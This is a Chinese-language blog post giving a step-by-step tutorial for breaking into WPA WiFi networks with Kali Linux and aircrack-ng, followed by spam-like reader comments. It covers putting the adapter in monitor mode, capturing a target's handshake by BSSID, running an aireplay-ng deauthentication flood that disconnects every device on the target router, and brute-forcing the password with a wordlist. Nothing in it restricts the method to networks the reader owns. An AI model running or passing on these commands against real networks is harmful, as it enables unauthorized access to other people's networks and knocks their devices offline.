Single

Kali aircrack-ng wifi密码破解(暴力)

这个技术其实已经很久就有的了,不过一般人都不知道有这方法
[dangerbox title=”准备工作”]
kail_Linux系统,安装系统
kail_Linux系统自带的字典,位置在/usr/share/wordlists/
芯片为3037或rtl8187l的无线网卡,这个可以在淘宝上买
[/dangerbox]
[infobox title=”开始破解”]
做好准备工作后开始wifi暴力破解
我们要使用的工具名叫aircrack-ng

  1. ifconfig查看你的网卡信息,wlan0即无线网卡
  2. 输入airmon-ng start wlan0(启动网卡监听模式)
  3. 启动后ifconfig查看一下,如果网卡名变成了wlan0mon了,则表示操作成功
  4. 输入airodump-ng wlan0mon(扫描附近wifi)
  5. 参数详解:
    BSSID: MAC地址
    PWR:信号强度,越小信号越强。
    #Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影
    CH:信号频道
    ESSID:wifi名称
  6. 输入airodump-ng -c 11 –bssid 2E:E9:D3:28:59:EB -w /桌面/dt1/ wlan0mon(开始抓包)
  7. 参数详解:
    -c代表频道, 后面带的是频道
    bssid: mac地址(物理地址)
    -w代表目录(抓到的握手包放在这个目录下面)
    wlan0mon: 网卡名称
  8. 一直跑吖跑, 它的数据是不停刷新变化的…
    这时候应该做点什么了,利用deauth洪水攻击,取消目标路由和所有设备的无线连接,这时候设备重新连接时,会抓取他的握手包,然后用字典进行爆破.
    新开一个窗口观察
    ps:如果无法获取包,攻击路由器进行断网重新连接.
    输入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB wlan0mon
  9. 如果抓到包记得ctrl+c关掉这里,否则一直断网就成恶作剧了。这时返回你抓包的那个窗口,如果右上角出现handshake这样的信息,这说明抓包已经成功。
  10. 输入:aircrack-ng -w /桌面/chenglee/dictionary/wpa.txt /桌面dt1/-01.cap(破解)
  11. 解析:
    -w后面接的是字典
    -01.cap是握手包
    也许过程会有点长, 这个得看密码复杂的与字典的好坏。

[/infobox]

文章有(6)条网友点评

  • Hi there, I enjoy reading through your post. I wanted to
    write a little comment to support you.

    • @Royal CBD OK, thank you for your comments

  • This design is incredible! You obviously know how to keep a reader amused.

    Between your wit and your videos, I was almost moved
    to start my own blog (well, almost…HaHa!) Fantastic
    job. I really enjoyed what you had to say, and more than that, how you
    presented it. Too cool!

    • @edenerotikashop.hu Thank you for clicking in to see my blog, but are you sure you didn’t send it wrong?

  • 看看小可爱

    • @LOGI 谢谢啦,最近老发烧,人都要傻了,今天才出院。

发表评论